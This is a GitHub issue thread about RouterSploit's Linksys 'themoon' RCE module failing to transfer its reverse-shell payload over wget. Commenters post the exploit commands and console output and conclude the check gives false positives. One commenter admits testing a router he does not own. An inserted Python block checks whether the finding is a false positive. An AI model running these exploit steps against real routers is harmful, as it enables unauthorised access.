Could not set up HTTP server on lhost / can't transfer payload

Open jansramek opened this issue 7 years ago • 34 comments

Current Behavior

  • Crashes when attempting to transfer payload/setting HTTP server (should be vulnerable)
  • Same behaviour on Mac OS & Kali Linux

cmd (MIPSLE Reverse TCP) > run
[*] Using wget method
[-] Could not set up HTTP Server on 192.168.0.102:5555
[-] Exploit failed to transfer payload

Expected Behavior

  • Should open reverse shell

Steps to Reproduce (for bugs)

  1. use exploits/routers/linksys/eseries_themoon_rce
  2. set target 192.168.0.1
  3. run
  4. set payload reverse_tcp
  5. set lhost 192.168.0.102
  6. run

Environment

  • RouterSploit Version used: 3.4.0 (on both OS)
  • Operating System and version: Mac OS 10.14.1 | Kali Linux 2018.1
  • Python Version: 3.7.1 | 3.6.7
  • Python Environment: asn1crypto==0.24.0 bcrypt==3.1.4 certifi==2018.10.15 cffi==1.11.5 chardet==3.0.4 cryptography==2.3.1 future==0.16.0 idna==2.7 paramiko==2.4.2 ply==3.11 pyasn1==0.4.4 pycparser==2.19 pycryptodome==3.6.6 pycryptodomex==3.6.6 PyNaCl==1.3.0 pysmi==0.3.1 pysnmp==4.4.6 requests==2.20.0 six==1.11.0 urllib3==1.24

jansramek avatar Nov 18 '18 17:11 jansramek

have the exact same problem! Please notify me if you find something that helps you.

stefan9999991 avatar Nov 18 '18 22:11 stefan9999991

Got the same problem, please notify me too (:

hackmybeer avatar Nov 21 '18 19:11 hackmybeer

Any solutions yet?

stefan9999991 avatar Nov 28 '18 22:11 stefan9999991

Also having it :( notify me when you find a solution

GianisTsol avatar Dec 22 '18 20:12 GianisTsol

Same here.

Keskebeu avatar Dec 24 '18 22:12 Keskebeu

same lol.

Bbcomb avatar Dec 26 '18 16:12 Bbcomb

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Keskebeu avatar Dec 26 '18 16:12 Keskebeu

Exact same here. However I can verify the router I'm scanning is NOT a Linksys router.

KentuckyJohnOliver avatar Jan 13 '19 20:01 KentuckyJohnOliver

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Same on a non-Linksys router. It is probably a false positive.

jansramek avatar Jan 15 '19 11:01 jansramek

Could be the case. The router I tried it on was a Linksys router. When I used it on a Motorola router nothing came up. I also read somewhere else that it had to do with that and we are expected to change the code based on the Linksys router.

It could be a router which is made by Linksys or uses Linksys components and or software, just different name.

On Tue, Jan 15, 2019, 6:21 AM jansramek <[email protected] wrote:

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Same on non Linksys router. It is probably false positives.

Keskebeu avatar Jan 15 '19 16:01 Keskebeu

same here

ghost avatar Feb 21 '19 02:02 ghost

I'm also having that issue, but I think I might have found a fix (keyword "might"): make sure apache is started by typing "sudo service apache2 start".

sudo-jake avatar Feb 22 '19 04:02 sudo-jake

Looks like a false positive. If you go through the logs it uses an HTTP GET for the tmUnblock.cgi file. It marks a successful GET as Vulnerable.

You can wget the file yourself:

wget <router IP>/tmUnblock.cgi

Compare it to the source code for the login screen. In my case, they're the same.

Hayzr avatar Mar 14 '19 22:03 Hayzr
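
The comparison described in the comment above, as an added example (not part of the thread and not RouterSploit's code): it classifies a finding that rests only on a successful GET of /tmUnblock.cgi by comparing that body with the root page and with a random path that cannot exist. The function names, the 0.9 line-similarity threshold and the two stand-in devices are assumptions constructed for illustration.

```python
import secrets
import urllib.error
import urllib.request

CGI_PATH = "/tmUnblock.cgi"   # path named in the comment above
SAME_PAGE = 0.9               # assumed threshold: share of lines two bodies have in common

def http_fetch(base_url, timeout=5):
    """Build fetch(path) -> (status, body) for a device you administer."""
    def fetch(path):
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as r:
                return r.status, r.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()
    return fetch

def similarity(a, b):
    """Jaccard similarity over lines, so a per-request token on one line is tolerated."""
    la, lb = set(a.splitlines()), set(b.splitlines())
    return 1.0 if la == lb else len(la & lb) / len(la | lb)

def triage_cgi_finding(fetch):
    """Classify a 'vulnerable' verdict that rests only on a successful GET."""
    status, body = fetch(CGI_PATH)
    if status != 200:
        return "absent"            # the GET the check relies on does not succeed
    # A name that cannot exist: a device that serves it too answers every path alike.
    bogus = "/" + secrets.token_hex(8) + ".cgi"
    for path in ("/", bogus):
        other_status, other_body = fetch(path)
        if other_status == 200 and similarity(body, other_body) >= SAME_PAGE:
            return "catch-all"     # same page as login/404 handler: likely false positive
    return "distinct"              # endpoint has its own response; finding needs real review

# Constructed stand-ins for two devices (not captured from real hardware).
def login_page():
    items = "".join(f"<li>menu item {i}</li>\n" for i in range(30))
    return f"<html>\n{items}<input name=csrf value={secrets.token_hex(8)}>\n</html>\n".encode()

def catch_all_device(path):
    return 200, login_page()       # every path, including tmUnblock.cgi, gets the login page

def real_endpoint_device(path):
    pages = {"/": (200, login_page()), CGI_PATH: (200, b"")}
    return pages.get(path, (404, b"not found"))
```

Against a router you administer, pass `http_fetch("http://<router IP>")` as the fetcher; a single-line (minified) page with an embedded token will not match under the line-based comparison.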

same here. i got this problem, how to solve ?

HarizDharma avatar Apr 02 '20 10:04 HarizDharma

I also have the same problem. Although it marks the router as vulnerable, I can confirm that the router is not Linksys, so it might be a false positive, but I wonder why the HTTP server error occurs. Setting up the server on lhost shouldn't be related to the payload working or not against the router. Any thoughts on this?

The fact of this issue being open since 2018 is not a good sign.

evoke0 avatar Apr 16 '20 13:04 evoke0

i get this too

ghost avatar May 21 '20 14:05 ghost

Anybody here found the solution ?

sealoomaan avatar Sep 19 '20 12:09 sealoomaan

Same error, but if I set a port that the router is using for other tcp/udp connections the payload is being handled somehow, I think anyway.

The router is a Huawei DG8245W2-10, not mine so I don't know fw v, the owner has forgotten the admin passw.

Here is the handshake - payload scr->wireshark

At first glance the response looked like a normal POST to /tmUnblock.cgi
....but there is something

l014 avatar Nov 26 '20 18:11 l014

heeeeeeeelp!!

gabriel2018-27 avatar Nov 27 '20 21:11 gabriel2018-27

any solution?

blackerr avatar Nov 29 '20 01:11 blackerr

2021, still doesn't work. Probably, as the guy said above, it's a "False Positive".

OmiceyO avatar Feb 15 '21 08:02 OmiceyO

any solution?

I have same problem

cm038 avatar Apr 27 '21 15:04 cm038

Nobody ?

cm038 avatar Apr 27 '21 15:04 cm038

Hey... When I change the lport it comes a step closer

cmd (MIPSLE Bind TCP) > set lport 8080
lport => 8080
cmd (MIPSLE Bind TCP) > run

[*] Using wget method
[*] Using wget to download binary
[-] Exploit failed to transfer payload

cm038 avatar Apr 27 '21 15:04 cm038

yeah still getting this, no idea what's going on, false-positive seems the most likely

overtimepog avatar May 15 '21 10:05 overtimepog

getting this too

imansour12 avatar Jun 22 '21 01:06 imansour12

I have same problem

andvargrad avatar Sep 05 '21 15:09 andvargrad

I think the "Could not set up HTTP server on lhost" message is displayed because it attempts at opening a new connection on the specified port without killing the first one, or something like this.

mariosacaj avatar Oct 29 '21 15:10 mariosacaj

I tried the checker for this exploitation module on a non-Linksys router, and it showed up as vulnerable, but had the same issue. I think we can confirm this is a false positive now.

Codeiology avatar May 11 '23 03:05 Codeiology

I have the same problem(

Dlazder avatar Sep 10 '23 08:09 Dlazder